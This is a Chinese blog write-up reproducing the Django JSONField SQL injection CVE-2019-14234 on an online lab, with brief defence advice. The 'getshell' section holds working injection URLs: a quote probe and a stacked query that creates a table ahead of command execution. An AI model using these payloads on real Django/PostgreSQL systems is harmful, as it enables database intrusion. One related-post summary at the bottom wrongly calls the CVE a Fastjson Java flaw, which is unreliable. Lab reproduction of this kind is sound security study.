【WEB攻防】【CVE-2019-14234】Django JSONField SQL注入 复现

最新推荐文章于 2023-12-10 14:40:15 发布
最新推荐文章于 2023-12-10 14:40:15 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: web攻防学习 文章标签: 前端 django sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122027777
版权

中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html

目录

知识简介

过程

查找注入

命令执行(getshell)

防御方法

知识简介

  • Django是一个开放源代码的Web应用框架,由Python写成。采用了MTV的框架模式,即模型M,视图V和模版T。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的,即是CMS(内容管理系统)软件。

  • PostgreSQL是一个自由的对象-关系数据库服务器(数据库管理系统),Django一般PostgreSQL共同使用

  • 在Django中支持Postgresql的数据类型:JSONField、HStoreField、ArrayField

  • 该漏洞出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接,通过JSONField类获得KeyTransform类并生成sql语句的位置,因此可以进行SQL注入
     

过程

进入漏洞环境环境(在线靶场)

BMZCTF

查找注入

账户名为:admin
密码为:a123123123     (密码是后台设置的,因为环境不是我们搭的,但这个密码我看教程是这样固定的)

进入管理员后台

 点击Collections

 输入

url改为 ....../admin/vuln/collection/?detail__a'b=123

测试是否存在注入(加个单引号报错)

报错,这时后端执行的语句为

Collection.objects.filter(**dict("detail__a'b": '123')).all()

命令执行(getshell)

.......admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20

这里已经执行了,只不过是没有这个文件。

防御方法

更新到最新版本,设置强密码,因为必须要登陆到管理员界面。

参考链接(详细学习的可以点这里)

CVE-2019-14234 Django JSONField SQL注入漏洞复现_m0_48520508的博客-CSDN博客

Django JSONField SQL注入漏洞(CVE-2019-14234)分析与影响 | 离别歌

作者水平有限,有任何不当之处欢迎指正。

本文目的是为了传播web安全原理知识,提高相关人员的安全意识,任何利用本文提到的技术与工具造成的违法行为,后果自负!

AAAAAAAAAAAA66
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-14234——SQL注入漏洞
战神/calmness的博客
11-21 1650
CVE-2019-14234Django JSONField SQL注入漏洞复现 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切. 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 漏洞概述: Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
CVE-2019-14234 Django JSONField SQL注入漏洞
weixin_45260839的博客
06-25 1640
CVE-2019-14234 Django JSONField SQL注入漏洞
16 - vulhub - Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234
利他者利己,利己者无功。利他利己,利己利他。
11-03 1111
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONFieldDjango是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQ
buuctf [Django]CVE-2019-14234
qq_1873822的博客
03-23 774
漏洞描述 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于DjangoJSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。 通过JSONField类获得KeyTransform类并生成sql语句的
python框架漏洞
最新发布
weixin_68408599的博客
12-10 1170
此博客讲述的是基于python框架的各种漏洞复现以及原理,包括sql注入以及ssti模板注入进行复现的过程,以及造成漏洞形成的粗略原理,靶场环境来自vulhub。
vulhub之CVE-2019-14234
u012871930的博客
03-20 315
web安全,sql注入CVE-2019-14234,编码
CVE-2019-14234漏洞复现SQL注入
weixin_71090536的博客
09-23 296
漏洞环境(路径):vulhub / django / CVE-2019-14234。1. 首先,使用用户名和密码登录 Django-Admin。用户名密码为:admin / a123123123。即表明此处含有 SQL 注入漏洞。3. 在其 URL 中添加 GET 参数。
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234
Beret-81的博客
06-15 599
Django JSONField/HStoreField SQL注入漏洞漏洞描述:环境搭建:漏洞复现: 漏洞描述: Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 Django2019年8月1日发布了一个安全更新,修复了在JSONField、HStoreField两个模型字段中存在的SQL注入漏洞。
Django CVE-2019-14234
weixin_44110913的博客
09-19 1006
CVE-2019-14234Django JSONField SQL注入漏洞复现 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切. 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 漏洞概述: Django通常搭配postg...
CVE-2019-14234 Django JSONField SQL注入漏洞复现
m0_48520508的博客
07-28 2448
0x01简介 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONFieldDjango是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有
django-cve_2019_14234漏洞
xiaomengxin70的博客
05-13 496
首先进入网页Django: the Web framework for perfectionists with deadlines.http://110.40.154.100:8000/ 该漏洞的简介 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。 该漏洞的出现的原因在于DjangoJSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。 进行a.
django shell
wan271920545的专栏
11-29 248
启动:  python manage.py shell 作用: 我们可以使用django shell进行一些调试工作,测试一些未知方法 例子: 查看模型返回值的构成 使用.all()时,看到的是下面的结果 (venv) D:\python\Django1.8.19\*******>python manage.py shell Python 2.7.15 (v2.7.15:c...
Django-shell
goforitaaa的博客
02-28 1708
一、首先我们先来看一下Django创建项目的步骤: 1、建立虚拟环境 2、安装虚拟环境 3、激活虚拟环境 4、安装Django 5、在Django中创建项目 6、创建数据库 7、查看项目 二、Django shell可以通过交互式终端测试项目中的数据,方便查看项目中的数据。 1、第一步:先激活环境 命令:venv\\Scripts\\activate 输入后项目名称前面有(venv),如下图所示: 2、输入shell命令进入shell终端: python manage..
Django 中的 shell命令
热门推荐
Strict Flora的博客
10-24 1万+
shell工具 Django的manage工具提供了shell命令,帮助我们配置好当前工程的运行环境(如连接好数据库等),以便可以直接在终端中执行测试python语句。 通过如下命令进入shell python manage.py shell 导入两个模型类,以便后续使用 from book.models import BookInfo,PeopleInfo 此文的shell 是 manage工具的 一条命令 还记得之前创建的管理员嘛,用的也是 manage命令,那我们说说这个 manage Dj
vulhub靶场cve-2019-14234
09-19
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞来执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值